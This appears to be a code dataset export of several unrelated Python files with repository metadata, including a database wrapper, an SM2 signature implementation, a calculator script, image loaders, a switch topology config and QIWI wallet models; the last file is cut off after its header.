self.test_query = test_query
self.connection_cmd = connection_cmd
self.error_regex=error_regex
self.fmt = fmt
self.__connection__ = None
def connect(self, test=True):
'''
Open a connection to the database.
'''
if not self.__program_exist__():
raise Exception("Command %s is not installed. the connection failed."
% self.cmd)
self.__connection__ = subprocess.Popen(
self.connection_cmd,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT
)
if test is True:
try:
self.__connection__.communicate(input=self.test_query)
print 'Connection openned successfuly.'
except Exception:
raise
def execute(self, query):
'''
Execute run sql query commande whithout return
results.
'''
try:
self.connect(test=False)
except:
pass
def select(self, query=None, fmt=None):
'''
Runs command and "always" return dictionary array
'''
self.connect(test=False)
def close(self):
'''
Close database connection
'''
self.__connection__.communicate(input="quit")
self.__connection__.kill()
print "Connection closed successfuly."
self.__connection__ = None
def tables(self, name=None, fmt=None):
'''
List all tables. If name is given return the
requested or None
'''
self.connect(test=False)
def description(self, table_name=None, fmt=None):
'''
List all table with descriptions
(table => fields => column : type)
If table_name is given only specified
will be listed
'''
self.connect(test=False)
def __program_exist__(self):
if self.cmd is None:
return True
try:
for cmd in self.cmd:
with open(os.devnull, 'w') as devnull:
subprocess.call([cmd], stderr=devnull)
return True
except OSError as e:
if e.errno == os.errno.ENOENT:
return False
return True
def __runsql__(self, sql, fmt=None):
pass
def has_error(self, output):
'''
Check if response from sql server came with error
'''
if self.error_regex is not None:
if re.search(self.error_regex, output) is not None:
return True
return False
def to_response(self, output, fmt=None):
'''
Marshall csv to dictionary
'''
if fmt == "csv":
return output.encode("utf-8").replace("\t", ",")
docs = []
with io.StringIO(output) as infile:
if fmt == "json":
return self.__to_dict__(infile)
if fmt == "sql":
return self.__to_table__(infile)
if fmt is None:
if self.fmt is "json":
return self.__to_dict__(infile)
return self.__to_table__(infile)
def __to_table__(self, infile):
reader = csv.reader(infile, delimiter='\t')
headers = reader.next()
return tabulate(reader, headers, tablefmt="orgtbl")
def __to_dict__(self, infile):
docs = []
for row in csv.DictReader(infile, delimiter='\t'):
doc = {key: value for key, value in row.items()}
docs.append(doc)
return json.dumps(docs, indent=4)
| 24.461111
| 81
| 0.539859
| 4,279
| 0.971837
| 0
| 0
| 0
| 0
| 0
| 0
| 954
| 0.21667
|
b18f1a4acb87b8bb932241fcbf259f84c3dba954
| 3,000
|
py
|
Python
|
MyCrypto/dsa/sm2_dsa.py
|
hiyouga/cryptography-experiment
|
d76abc56d6c09c96dd93abcd51d3c9e38fc8787c
|
[
"MIT"
] | 8
|
2019-11-30T14:45:13.000Z
|
2022-03-16T10:09:34.000Z
|
MyCrypto/dsa/sm2_dsa.py
|
hiyouga/Cryptographic-Algorithms-Python
|
d76abc56d6c09c96dd93abcd51d3c9e38fc8787c
|
[
"MIT"
] | null | null | null |
MyCrypto/dsa/sm2_dsa.py
|
hiyouga/Cryptographic-Algorithms-Python
|
d76abc56d6c09c96dd93abcd51d3c9e38fc8787c
|
[
"MIT"
] | null | null | null |
import sys
sys.path.append("../..")
import random
from MyCrypto.utils.bitarray import bitarray
from MyCrypto.algorithms.exgcd import inverse
from MyCrypto.ecc.sm2 import SM2
class SM2_DSA(SM2):
def __init__(self):
super().__init__()
def _identity(self, uid:bitarray, PK) -> bitarray:
entlen = bitarray(len(uid), 16)
a = self._bytes2bits(self._elem2bytes(self._G.a))
b = self._bytes2bits(self._elem2bytes(self._G.b))
gx = self._bytes2bits(self._elem2bytes(self._G.x))
gy = self._bytes2bits(self._elem2bytes(self._G.y))
ax = self._bytes2bits(self._elem2bytes(PK.x))
ay = self._bytes2bits(self._elem2bytes(PK.y))
return self._hash(bitarray.concat((entlen, uid, a, b, gx, gy, ax, ay)))[:256]
def sign(self, M:bytes, uid:bytes, SK:int) -> tuple:
M, uid = self._bytes2bits(M), self._bytes2bits(uid)
PK = SK * self._G
Z = self._identity(uid, PK)
M = bitarray.concat((Z, M))
e = self._bytes2int(self._bits2bytes(self._hash(M)))
while True:
k = random.randint(1, self._n-1)
P = k * self._G
x1 = self._elem2int(P.x)
r = (e + x1) % self._n
if r == 0 or r+k == self._n:
continue
s = (inverse(1+SK, self._n) * (k-r*SK)) % self._n
if s != 0:
break
r, s = self._int2bytes(r, self._byteLen), self._int2bytes(s, self._byteLen)
return (r, s)
def verify(self, M:bytes, sign:tuple, uid:bytes, PK):
r, s = sign
r, s = self._bytes2int(r), self._bytes2int(s)
assert 1 <= r <= self._n-1 and 1 <= s <= self._n-1
M, uid = self._bytes2bits(M), self._bytes2bits(uid)
Z = self._identity(uid, PK)
M = bitarray.concat((Z, M))
e = self._bytes2int(self._bits2bytes(self._hash(M)))
t = (r + s) % self._n
assert t != 0
P = s * self._G + t * PK
x1 = self._elem2int(P.x)
R = (e + x1) % self._n
return R == r
def sign_file(self, fn:str, uid:bytes, SK:int):
with open(fn, 'rb') as f:
data = f.read()
r, s = self.sign(data, uid, SK)
with open(fn+'.sign', 'wb') as f:
f.write(r+s)
def verify_file(self, fn:str, sf:str, uid:bytes, PK):
with open(fn, 'rb') as f:
data = f.read()
with open(sf, 'rb') as f:
sign = f.read()
r, s = sign[:self._byteLen], sign[self._byteLen:]
return self.verify(data, (r, s), uid, PK)
if __name__ == '__main__':
message = b'message'
uid = b'ID:A'
sm2_dsa = SM2_DSA()
sk, pk = sm2_dsa.generate_keys()
sign = sm2_dsa.sign(message, uid, sk)
print(sign)
print(sm2_dsa.verify(message, sign, uid, pk))
''' file test '''
sm2_dsa.sign_file('../testdata/text.txt', uid, sk)
print(sm2_dsa.verify_file('../testdata/text.txt', '../testdata/text.txt.sign', uid, pk))
| 35.714286
| 92
| 0.549667
| 2,409
| 0.803
| 0
| 0
| 0
| 0
| 0
| 0
| 145
| 0.048333
|
b18f8ac4ca91a60fabe49e7603be45706caf3334
| 52
|
py
|
Python
|
chatbot/component/__init__.py
|
zgj0607/ChatBot
|
3c6126754b9d037a04bd80d13874e2ae16b2c421
|
[
"Apache-2.0"
] | null | null | null |
chatbot/component/__init__.py
|
zgj0607/ChatBot
|
3c6126754b9d037a04bd80d13874e2ae16b2c421
|
[
"Apache-2.0"
] | null | null | null |
chatbot/component/__init__.py
|
zgj0607/ChatBot
|
3c6126754b9d037a04bd80d13874e2ae16b2c421
|
[
"Apache-2.0"
] | null | null | null |
__all__ = (
'readonly_admin',
'singleton'
)
| 10.4
| 21
| 0.576923
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 27
| 0.519231
|
b18f8f8fa2a426987f403aea37090ba3d3fc94d4
| 5,103
|
py
|
Python
|
calculadora.py
|
LucasCouto22/calculadoraPython
|
84426c8d71f2c2186ae500245423516000e19ec0
|
[
"Apache-2.0"
] | null | null | null |
calculadora.py
|
LucasCouto22/calculadoraPython
|
84426c8d71f2c2186ae500245423516000e19ec0
|
[
"Apache-2.0"
] | null | null | null |
calculadora.py
|
LucasCouto22/calculadoraPython
|
84426c8d71f2c2186ae500245423516000e19ec0
|
[
"Apache-2.0"
] | null | null | null |
def somar(x, y):
if x and y >= 0:
x = x + y
return(x)
def subtrair(x, y):
if x and y >= 0:
x = x - y
return(x)
def multiplicar(x, y):
if x and y >= 0:
x = x * y
return(x)
def dividirInteiro(x, y):
if x and y >= 0:
x = x / y
return(x)
def dividir(x, y):
if x and y >= 0:
x = x // y
return(x)
def porcentagem(x, y):
if x and y >= 0:
x = x * y
x = x / 100
return(x)
def exponencial(x, y):
if x and y >= 0:
x = x ** y
return(x)
def raizQuadrada(x):
if x >= 0:
x = x ** 0.5
return(x)
controller = 0
fim = 0
while controller != 2:
if controller == 1 or controller == 0:
e = int(input('Digite um número para escolher: \n'
' 1 para soma \n'
' 2 para subtração \n'
' 3 para multiplicação \n'
' 4 para divisão inteira \n'
' 5 para divisão real \n '
'6 para porcentagem \n'
' 7 para exponencial \n'
' 8 para raiz quadrada: '))
if e == 1:
if controller == 0:
h = int(input('Digite um valor: '))
t = int(input('Digite um valor para somar: '))
c = somar(h, t)
fim = c
print('Resultado: ', fim)
elif controller == 1:
t = int(input('Digite um valor para somar: '))
c = somar(fim, t)
fim = c
print('Resultado: ', fim)
elif e == 2:
if controller == 0:
h = int(input('Digite um valor: '))
t = int(input('Digite um valor para subtrair: '))
c = subtrair(h, t)
fim = c
print('Resultado: ', fim)
elif controller == 1:
t = int(input('Digite um valor para subtrair: '))
c = subtrair(fim, t)
fim = c
print('Resultado: ', fim)
elif e == 3:
if controller == 0:
h = int(input('Digite o primeiro valor: '))
t = int(input('Digite o segundo valor: '))
c = multiplicar(h, t)
fim = c
print('Resultado: ', fim)
elif controller == 1:
t = int(input('Digite um valor para multiplicar: '))
c = multiplicar(fim, t)
fim = c
print('Resultado: ', fim)
elif e == 4:
if controller == 0:
h = int(input('Digite o valor a ser dividido: '))
t = int(input('Digite o valor divisor: '))
c = dividirInteiro(h, t)
fim = c
print('Resultado: ', fim)
elif controller == 1:
t = int(input('Digite um valor para divisor: '))
c = dividirInteiro(fim, t)
fim = c
print('Resultado: ', fim)
elif e == 5:
if controller == 0:
h = int(input('Digite o valor a ser dividido: '))
t = int(input('Digite o valor divisor: '))
c = dividir(h, t)
fim = c
print('Resultado: ', fim)
elif controller == 1:
t = int(input('Digite um valor para divisor: '))
c = dividir(fim, t)
fim = c
print('Resultado: ', fim)
elif e == 6:
if controller == 0:
h = int(input('Digite o valor: '))
t = int(input('Digite a porcentagem: '))
c = porcentagem(h, t)
fim = c
print('Resultado final: ', fim,'%')
break;
elif controller == 1:
t = int(input('Digite o valor para descobrir porcentagem: '))
c = porcentagem(fim, t)
fim = c
print('Resultado final: ', fim,'%')
break;
elif e == 7:
if controller == 0:
h = int(input('Digite o valor: '))
t = int(input('Elevado a: '))
c = exponencial(h, t)
fim = c
print('Resultado: ', fim)
elif controller == 1:
t = int(input('Elevado a: '))
c = exponencial(fim, t)
fim = c
print('Resultado: ', fim)
elif e == 8:
if controller == 0:
t = int(input('Número para descobrir raiz quadrada: '))
c = raizQuadrada(t)
fim = c
print('Resultado: ', fim)
elif controller == 1:
c = raizQuadrada(fim)
fim = c
print('Resultado: ', fim)
controller = int(input('Deseja continuar? \n'
'Se sim digite 1, se não digite 2: '))
if controller == 2:
print('Valor Final: ',fim)
break;
| 26.440415
| 77
| 0.406232
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,141
| 0.2232
|
b190d1c3b154f53e7b40cd2cb8a33782b7ce1f7f
| 1,982
|
py
|
Python
|
prime_issue_spoilage/main.py
|
NicholasSynovic/ssl-metrics-github-issue-spoilage
|
05711b6103aa6b6b935d02aa92fbcaf735a63cea
|
[
"BSD-3-Clause"
] | null | null | null |
prime_issue_spoilage/main.py
|
NicholasSynovic/ssl-metrics-github-issue-spoilage
|
05711b6103aa6b6b935d02aa92fbcaf735a63cea
|
[
"BSD-3-Clause"
] | null | null | null |
prime_issue_spoilage/main.py
|
NicholasSynovic/ssl-metrics-github-issue-spoilage
|
05711b6103aa6b6b935d02aa92fbcaf735a63cea
|
[
"BSD-3-Clause"
] | null | null | null |
from argparse import Namespace
from datetime import datetime
import pandas
from dateutil.parser import parse as dateParse
from intervaltree import IntervalTree
from pandas import DataFrame
from prime_issue_spoilage.utils.primeIssueSpoilageArgs import mainArgs
def getIssueTimelineIntervals(day0: datetime, issues: DataFrame) -> list:
intervals = []
foo: str | datetime
bar: str | datetime
for foo, bar in zip(issues["created_at"], issues["closed_at"]):
startDate: datetime = dateParse(str(foo)).replace(tzinfo=None)
endDate: datetime = dateParse(str(bar)).replace(tzinfo=None)
startDaySince0: int = (startDate - day0).days
endDaySince0: int = (endDate - day0).days
intervals.append((startDaySince0, endDaySince0))
return intervals
def buildIntervalTree(intervals: list) -> IntervalTree:
tree: IntervalTree = IntervalTree()
interval: tuple
for interval in intervals:
tree.addi(interval[0], interval[1] + 1, 1)
return tree
def getDailyIssueSpoilage(intervals: IntervalTree, timeline: list) -> list:
return [len(intervals[day]) for day in timeline]
def main() -> None:
args: Namespace = mainArgs()
issues: DataFrame = pandas.read_json(args.input).T
day0: datetime = dateParse(issues["created_at"][0]).replace(tzinfo=None)
dayN: datetime = datetime.now().replace(tzinfo=None)
timeline: list = [day for day in range((dayN - day0).days)]
issues["created_at"] = issues["created_at"].fillna(day0)
issues["closed_at"] = issues["closed_at"].fillna(dayN)
intervals: list = getIssueTimelineIntervals(day0, issues)
intervalTree: IntervalTree = buildIntervalTree(intervals)
dailyIssuesSpoilage: list = getDailyIssueSpoilage(intervalTree, timeline)
data: dict = {
"days_since_0": timeline,
"issue_spoilage": dailyIssuesSpoilage,
}
DataFrame(data).to_json(args.output, indent=4)
if __name__ == "__main__":
main()
| 28.314286
| 77
| 0.706862
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 121
| 0.061049
|
b192038591712556b2d6695f9b0d3ac03bfac07f
| 4,544
|
py
|
Python
|
IFR/mmseg/datasets/pipelines/semi/loading.py
|
jfzhuang/IFR
|
d6ffdd0c0810d7bb244f102ba8cc19c12f61e102
|
[
"MIT"
] | 3
|
2022-03-09T13:15:15.000Z
|
2022-03-21T06:59:10.000Z
|
IFR/mmseg/datasets/pipelines/semi/loading.py
|
jfzhuang/IFR
|
d6ffdd0c0810d7bb244f102ba8cc19c12f61e102
|
[
"MIT"
] | null | null | null |
IFR/mmseg/datasets/pipelines/semi/loading.py
|
jfzhuang/IFR
|
d6ffdd0c0810d7bb244f102ba8cc19c12f61e102
|
[
"MIT"
] | null | null | null |
import os.path as osp
import mmcv
import numpy as np
from mmseg.datasets.builder import PIPELINES
@PIPELINES.register_module()
class LoadImageFromFile_Semi(object):
def __init__(
self, to_float32=False, color_type='color', file_client_args=dict(backend='disk'), imdecode_backend='cv2'
):
self.to_float32 = to_float32
self.color_type = color_type
self.file_client_args = file_client_args.copy()
self.file_client = None
self.imdecode_backend = imdecode_backend
def __call__(self, results):
if self.file_client is None:
self.file_client = mmcv.FileClient(**self.file_client_args)
if results.get('img_prefix') is not None:
filenames_v0_0 = osp.join(results['img_prefix'], results['img_info_v0_0']['filename'])
filenames_v0_1 = osp.join(results['img_prefix'], results['img_info_v0_1']['filename'])
filenames_v1_0 = osp.join(results['img_prefix'], results['img_info_v1_0']['filename'])
filenames_v1_1 = osp.join(results['img_prefix'], results['img_info_v1_1']['filename'])
else:
filenames_v0_0 = results['img_info_v0_0']['filename']
filenames_v0_1 = results['img_info_v0_1']['filename']
filenames_v1_0 = results['img_info_v1_0']['filename']
filenames_v1_1 = results['img_info_v1_1']['filename']
img_bytes = self.file_client.get(filenames_v0_0)
img = mmcv.imfrombytes(img_bytes, flag=self.color_type, backend=self.imdecode_backend)
if self.to_float32:
img = img.astype(np.float32)
results['img_v0_0'] = img
img_bytes = self.file_client.get(filenames_v0_1)
img = mmcv.imfrombytes(img_bytes, flag=self.color_type, backend=self.imdecode_backend)
if self.to_float32:
img = img.astype(np.float32)
results['img_v0_1'] = img
img_bytes = self.file_client.get(filenames_v1_0)
img = mmcv.imfrombytes(img_bytes, flag=self.color_type, backend=self.imdecode_backend)
if self.to_float32:
img = img.astype(np.float32)
results['img_v1_0'] = img
img_bytes = self.file_client.get(filenames_v1_1)
img = mmcv.imfrombytes(img_bytes, flag=self.color_type, backend=self.imdecode_backend)
if self.to_float32:
img = img.astype(np.float32)
results['img_v1_1'] = img
num_channels = 1 if len(img.shape) < 3 else img.shape[2]
results['img_norm_cfg'] = dict(
mean=np.zeros(num_channels, dtype=np.float32), std=np.ones(num_channels, dtype=np.float32), to_rgb=False
)
return results
def __repr__(self):
repr_str = self.__class__.__name__
repr_str += f'(to_float32={self.to_float32},'
repr_str += f"color_type='{self.color_type}',"
repr_str += f"imdecode_backend='{self.imdecode_backend}')"
return repr_str
@PIPELINES.register_module()
class LoadAnnotations_Semi(object):
def __init__(self, reduce_zero_label=False, file_client_args=dict(backend='disk'), imdecode_backend='pillow'):
self.reduce_zero_label = reduce_zero_label
self.file_client_args = file_client_args.copy()
self.file_client = None
self.imdecode_backend = imdecode_backend
def __call__(self, results):
if self.file_client is None:
self.file_client = mmcv.FileClient(**self.file_client_args)
if results.get('seg_prefix', None) is not None:
filename = osp.join(results['seg_prefix'], results['img_info_v0_0']['ann'])
else:
filename = results['img_info_v0_0']['ann']
img_bytes = self.file_client.get(filename)
gt = mmcv.imfrombytes(img_bytes, flag='unchanged', backend=self.imdecode_backend).squeeze().astype(np.uint8)
# modify if custom classes
if results.get('label_map', None) is not None:
for old_id, new_id in results['label_map'].items():
gt[gt == old_id] = new_id
# reduce zero_label
if self.reduce_zero_label:
# avoid using underflow conversion
gt[gt == 0] = 255
gt = gt - 1
gt[gt == 254] = 255
results['gt'] = gt
results['seg_fields'].append('gt')
return results
def __repr__(self):
repr_str = self.__class__.__name__
repr_str += f'(reduce_zero_label={self.reduce_zero_label},'
repr_str += f"imdecode_backend='{self.imdecode_backend}')"
return repr_str
| 40.571429
| 116
| 0.650088
| 4,380
| 0.963908
| 0
| 0
| 4,438
| 0.976673
| 0
| 0
| 748
| 0.164613
|
b192ffd8dc0dbef0c193761ff4f0641070958f09
| 3,384
|
py
|
Python
|
topologies/dc_t1.py
|
andriymoroz/sai-challenger
|
665f5dbff8c797cfd55cc0c13b03a77aefdb9977
|
[
"Apache-2.0"
] | 11
|
2021-04-23T05:54:05.000Z
|
2022-03-29T16:37:42.000Z
|
topologies/dc_t1.py
|
andriymoroz/sai-challenger
|
665f5dbff8c797cfd55cc0c13b03a77aefdb9977
|
[
"Apache-2.0"
] | 4
|
2021-06-02T11:05:31.000Z
|
2021-11-26T14:39:50.000Z
|
topologies/dc_t1.py
|
andriymoroz/sai-challenger
|
665f5dbff8c797cfd55cc0c13b03a77aefdb9977
|
[
"Apache-2.0"
] | 14
|
2021-02-27T15:17:31.000Z
|
2021-11-01T10:15:51.000Z
|
from contextlib import contextmanager
import pytest
from sai import SaiObjType
@contextmanager
def config(npu):
topo_cfg = {
"lo_rif_oid": None,
"cpu_port_oid": None,
}
# Create Loopback RIF
lo_rif_oid = npu.create(SaiObjType.ROUTER_INTERFACE,
[
"SAI_ROUTER_INTERFACE_ATTR_VIRTUAL_ROUTER_ID", npu.default_vrf_oid,
"SAI_ROUTER_INTERFACE_ATTR_TYPE", "SAI_ROUTER_INTERFACE_TYPE_LOOPBACK",
"SAI_ROUTER_INTERFACE_ATTR_MTU", "9100"
])
topo_cfg["lo_rif_oid"] = lo_rif_oid
# Get CPU port
cpu_port_oid = npu.get(npu.oid, ["SAI_SWITCH_ATTR_CPU_PORT", "oid:0x0"]).oid()
topo_cfg["cpu_port_oid"] = cpu_port_oid
# Get port HW lanes
for oid in npu.port_oids:
port_lanes = npu.get(oid, ["SAI_PORT_ATTR_HW_LANE_LIST", "8:0,0,0,0,0,0,0,0"]).to_list()
# Remove default VLAN members
vlan_mbr_oids = npu.get_list(npu.default_vlan_oid, "SAI_VLAN_ATTR_MEMBER_LIST", "oid:0x0")
for oid in vlan_mbr_oids:
npu.remove(oid)
# Remove default 1Q bridge members
dot1q_mbr_oids = npu.get_list(npu.dot1q_br_oid, "SAI_BRIDGE_ATTR_PORT_LIST", "oid:0x0")
for oid in dot1q_mbr_oids:
bp_type = npu.get(oid, ["SAI_BRIDGE_PORT_ATTR_TYPE", "SAI_BRIDGE_PORT_TYPE_PORT"]).value()
if bp_type == "SAI_BRIDGE_PORT_TYPE_PORT":
npu.remove(oid)
npu.dot1q_bp_oids.clear()
# Create default routes
npu.create_route("0.0.0.0/0", npu.default_vrf_oid, None,
["SAI_ROUTE_ENTRY_ATTR_PACKET_ACTION", "SAI_PACKET_ACTION_DROP"])
npu.create_route("::/0", npu.default_vrf_oid, None,
["SAI_ROUTE_ENTRY_ATTR_PACKET_ACTION", "SAI_PACKET_ACTION_DROP"])
# Create Loopback RIF routes
npu.create_route("fe80::5054:ff:fe12:3456/128", npu.default_vrf_oid, cpu_port_oid,
["SAI_ROUTE_ENTRY_ATTR_PACKET_ACTION", "SAI_PACKET_ACTION_FORWARD"])
npu.create_route("fe80::/10", npu.default_vrf_oid, cpu_port_oid,
["SAI_ROUTE_ENTRY_ATTR_PACKET_ACTION", "SAI_PACKET_ACTION_FORWARD"])
yield topo_cfg
# TODO: TEARDOWN
# Remove default routes
npu.remove_route("fe80::/10", npu.default_vrf_oid)
npu.remove_route("fe80::5054:ff:fe12:3456/128", npu.default_vrf_oid)
npu.remove_route("::/0", npu.default_vrf_oid)
npu.remove_route("0.0.0.0/0", npu.default_vrf_oid)
# Create default 1Q bridge members
for oid in npu.port_oids:
bp_oid = npu.create(SaiObjType.BRIDGE_PORT,
[
"SAI_BRIDGE_PORT_ATTR_TYPE", "SAI_BRIDGE_PORT_TYPE_PORT",
"SAI_BRIDGE_PORT_ATTR_PORT_ID", oid,
# "SAI_BRIDGE_PORT_ATTR_BRIDGE_ID", dot1q_br.oid(),
"SAI_BRIDGE_PORT_ATTR_ADMIN_STATE", "true"
])
npu.dot1q_bp_oids.append(bp_oid)
# Create default VLAN members and set PVID
for idx, oid in enumerate(npu.port_oids):
npu.create_vlan_member(npu.default_vlan_oid, npu.dot1q_bp_oids[idx], "SAI_VLAN_TAGGING_MODE_UNTAGGED")
npu.set(oid, ["SAI_PORT_ATTR_PORT_VLAN_ID", npu.default_vlan_id])
# Remove Loopback RIF
npu.remove(lo_rif_oid)
| 40.285714
| 110
| 0.637411
| 0
| 0
| 3,285
| 0.970745
| 3,301
| 0.975473
| 0
| 0
| 1,336
| 0.394799
|
b193f13f0d572526822d816991b5f3105ef56820
| 7,045
|
py
|
Python
|
asynchronous_qiwi/models/QIWIWallet/master_m/list_qvc.py
|
LexLuthorReal/asynchronous_qiwi
|
5847a8d4008493656e973e5283888a4e57234962
|
[
"MIT"
] | 3
|
2021-05-20T02:36:30.000Z
|
2021-11-28T16:00:15.000Z
|
asynchronous_qiwi/models/QIWIWallet/master_m/list_qvc.py
|
LexLuthorReal/asynchronous_qiwi
|
5847a8d4008493656e973e5283888a4e57234962
|
[
"MIT"
] | null | null | null |
asynchronous_qiwi/models/QIWIWallet/master_m/list_qvc.py
|
LexLuthorReal/asynchronous_qiwi
|
5847a8d4008493656e973e5283888a4e57234962
|
[
"MIT"
] | 1
|
2021-11-28T16:00:20.000Z
|
2021-11-28T16:00:20.000Z
|
from loguru import logger
import datetime
from pydantic.fields import ModelField
from typing import Optional, List, Union, Any
from ....utils.tools.str_datetime import convert
from pydantic import BaseModel, Field, validator, ValidationError
from ....data_types.QIWIWallet.list_qvc import ReleasedCardStatus, CardType, CardAlias
class AmountData(BaseModel):
"""Object: \"AmountData\""""
amount: float = Field(..., alias="amount")
currency: str = Field(..., alias="currency")
class Requisites(BaseModel):
name: str = Field(..., alias="name")
value: str = Field(..., alias="value")
class Details(BaseModel):
info: str = Field(..., alias="info")
description: str = Field(..., alias="description")
tariff_link: str = Field(..., alias="tariffLink")
offer_link: str = Field(..., alias="offerLink")
features: List[Any] = Field(..., alias="features")
requisites: List[Union[Requisites]] = Field(..., alias="requisites")
class Info(BaseModel):
id: int = Field(..., alias="id")
name: str = Field(..., alias="name")
alias: Union[str, CardAlias] = Field(..., alias="alias")
price: AmountData = Field(..., alias="price")
period: str = Field(..., alias="period")
type: Union[str, CardAlias] = Field(..., alias="type")
details: Details = Field(..., alias="details")
@validator("alias")
def alias_type(cls, alias: Union[str, CardAlias], field: ModelField) -> CardAlias:
if isinstance(alias, str):
try:
alias = CardAlias(alias)
except KeyError as e:
logger.warning(f"[VALIDATION CONVERT] {field.name.upper()}: " + str(e))
else:
return alias
elif isinstance(alias, CardAlias):
return alias
raise ValidationError(model=Info)
@validator("type")
def card_type_type(cls, card_type: Union[str, CardAlias], field: ModelField) -> CardAlias:
if isinstance(card_type, str):
try:
card_type = CardAlias[card_type]
except KeyError as e:
logger.warning(f"[VALIDATION CONVERT] {field.name.upper()}: " + str(e))
else:
return card_type
elif isinstance(card_type, CardAlias):
return card_type
raise ValidationError(model=Info)
class QVX(BaseModel):
id: int = Field(..., alias="id")
masked_pan: str = Field(..., alias="maskedPan")
status: Optional[Union[str, ReleasedCardStatus]] = Field(..., alias="status")
card_expire: Optional[Union[str, datetime.datetime]] = Field(..., alias="cardExpire")
card_type: Optional[Union[str, CardType]] = Field(..., alias="cardType")
card_alias: str = Field(..., alias="cardAlias")
card_limit: Optional[str] = Field(..., alias="cardLimit")
activated: Optional[Union[str, datetime.datetime]] = Field(..., alias="activated")
sms_resended: Optional[Union[str, datetime.datetime]] = Field(..., alias="smsResended")
post_number: Optional[str] = Field(..., alias="postNumber")
blocked_date: Optional[Union[str, datetime.datetime]] = Field(..., alias="blockedDate")
full_pan: Optional[str] = Field(..., alias="fullPan")
card_id: int = Field(..., alias="cardId")
txn_id: str = Field(..., alias="txnId")
card_expire_month: str = Field(..., alias="cardExpireMonth")
card_expire_year: str = Field(..., alias="cardExpireYear")
@validator('status')
def status_types(cls, status: Union[str, ReleasedCardStatus], field: ModelField) -> ReleasedCardStatus:
if isinstance(status, str):
try:
status = ReleasedCardStatus[status]
except KeyError as e:
logger.warning(f"[VALIDATION CONVERT] {field.name.upper()}: " + str(e))
else:
return status
elif isinstance(status, ReleasedCardStatus):
return status
raise ValidationError(model=QVX)
@validator('card_expire')
def card_expire_datetime(cls, card_expire: Optional[Union[str, datetime.datetime]],
field: ModelField) -> Optional[datetime.datetime]:
if isinstance(card_expire, str):
card_expire = convert(value=card_expire, validator_name=field.name.upper(), alert=False)
return card_expire
elif isinstance(card_expire, datetime.datetime):
return card_expire
elif card_expire is None:
return card_expire
raise ValidationError(model=QVX)
@validator('card_type')
def card_types(cls, card_type: Union[str, CardType], field: ModelField) -> CardType:
if isinstance(card_type, str):
try:
card_type = CardType[card_type]
except KeyError as e:
logger.warning(f"[VALIDATION CONVERT] {field.name.upper()}: " + str(e))
else:
return card_type
elif isinstance(card_type, CardType):
return card_type
raise ValidationError(model=QVX)
@validator('activated')
def activated_datetime(cls, activated: Optional[Union[str, datetime.datetime]],
field: ModelField) -> Optional[datetime.datetime]:
if isinstance(activated, str):
activated = convert(value=activated, validator_name=field.name.upper(), alert=False)
return activated
elif isinstance(activated, datetime.datetime):
return activated
elif activated is None:
return activated
raise ValidationError(model=QVX)
@validator('sms_resended')
def sms_resended_datetime(cls, sms_resended: Optional[Union[str, datetime.datetime]],
field: ModelField) -> Optional[datetime.datetime]:
if isinstance(sms_resended, str):
sms_resended = convert(value=sms_resended, validator_name=field.name.upper(), alert=False)
return sms_resended
elif isinstance(sms_resended, datetime.datetime):
return sms_resended
elif sms_resended is None:
return sms_resended
raise ValidationError(model=QVX)
@validator('blocked_date')
def blocked_date_datetime(cls, blocked_date: Optional[Union[str, datetime.datetime]],
field: ModelField) -> Optional[datetime.datetime]:
if isinstance(blocked_date, str):
blocked_date = convert(value=blocked_date, validator_name=field.name.upper(), alert=False)
return blocked_date
elif isinstance(blocked_date, datetime.datetime):
return blocked_date
elif blocked_date is None:
return blocked_date
raise ValidationError(model=QVX)
class ListCard(BaseModel):
qvx: QVX = Field(..., alias="qvx")
balance: Optional[AmountData] = Field(..., alias="balance")
info: Info = Field(..., alias="info")
features: List[Any] = Field(..., alias="features")
class ListCardMaster(BaseModel):
data: List[Union[ListCard]] = Field(..., alias="data")
| 41.686391
| 107
| 0.628957
| 6,695
| 0.950319
| 0
| 0
| 4,255
| 0.603974
| 0
| 0
| 647
| 0.091838
|
b194d8469a9b5649a06d4a8f9eab020579871edb
| 818
|
py
|
Python
|
src/mciso/visualize.py
|
lancechua/mciso
|
2fd406b7c54f9cb6b331ae8ad3470d1f47696494
|
[
"MIT"
] | 2
|
2021-08-06T14:20:37.000Z
|
2022-03-29T16:13:10.000Z
|
src/mciso/visualize.py
|
lancechua/mciso
|
2fd406b7c54f9cb6b331ae8ad3470d1f47696494
|
[
"MIT"
] | null | null | null |
src/mciso/visualize.py
|
lancechua/mciso
|
2fd406b7c54f9cb6b331ae8ad3470d1f47696494
|
[
"MIT"
] | 1
|
2021-08-06T14:21:13.000Z
|
2021-08-06T14:21:13.000Z
|
import matplotlib.pyplot as plt
import pandas as pd
def scenarios_by_product(
X: "np.ndarray", indices: list, products: list, ax: plt.Axes = None
) -> plt.Axes:
"""Plot generated scenarios, with a subplot for each product"""
if ax is None:
_, ax = plt.subplots(X.shape[-1], 1, figsize=(8, X.shape[-1] * 2), sharex=True)
try:
iter(ax)
except TypeError:
ax = [ax]
for i, prod_i in enumerate(products):
pd.DataFrame(
X[:, :, i],
index=indices,
).plot(ax=ax[i], alpha=0.05, linewidth=3, legend=None, color="gray")
pd.DataFrame(X[:, :, i].mean(axis=1), index=indices, columns=["avg"]).plot(
ax=ax[i], alpha=0.8, linewidth=1, legend=None, color="blue"
)
ax[i].set_ylabel(prod_i)
return ax
| 27.266667
| 87
| 0.57335
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 92
| 0.112469
|
b194dd14e51803a9d2a228b8e98a09f53e6b31cf
| 26,160
|
py
|
Python
|
sdk/apimanagement/azure-mgmt-apimanagement/azure/mgmt/apimanagement/models/_api_management_client_enums.py
|
vincenttran-msft/azure-sdk-for-python
|
348b56f9f03eeb3f7b502eed51daf494ffff874d
|
[
"MIT"
] | 1
|
2021-09-07T18:39:05.000Z
|
2021-09-07T18:39:05.000Z
|
sdk/apimanagement/azure-mgmt-apimanagement/azure/mgmt/apimanagement/models/_api_management_client_enums.py
|
vincenttran-msft/azure-sdk-for-python
|
348b56f9f03eeb3f7b502eed51daf494ffff874d
|
[
"MIT"
] | null | null | null |
sdk/apimanagement/azure-mgmt-apimanagement/azure/mgmt/apimanagement/models/_api_management_client_enums.py
|
vincenttran-msft/azure-sdk-for-python
|
348b56f9f03eeb3f7b502eed51daf494ffff874d
|
[
